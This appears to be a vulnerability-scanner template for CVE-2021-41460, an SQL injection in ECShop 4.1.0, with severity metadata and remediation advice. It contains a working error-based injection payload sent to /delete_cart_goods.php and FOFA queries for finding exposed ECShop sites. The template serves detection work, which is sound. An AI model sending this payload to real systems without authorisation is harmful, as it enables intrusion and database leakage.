Description
ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.
ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.
id: CVE-2021-41460
info:
name: ECShop 4.1.0 - SQL Injection
author: SleepingBag945
severity: high
description: |
ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
remediation: |
Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460).
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-58823
- https://nvd.nist.gov/vuln/detail/CVE-2021-41460
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-41460
cwe-id: CWE-89
epss-score: 0.06728
epss-percentile: 0.93603
cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: shopex
product: ecshop
fofa-query:
- product="ECShop"
- product="ecshop"
tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex,vuln
variables:
num: "999999999"
http:
- raw:
- |
POST /delete_cart_goods.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'c8c605999f3d8352d7bb792cf3fdb25'
- type: status
status:
- 200
# digest: 490a004630440220418e1e450f27f0da25d14c6b810ded44a9443498cd74f5a72ee89fce152cb2fb02205dd895c5e7b854c802b802a303e060d2d73a2c2dc18ed284fadbea8bce12db8b:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.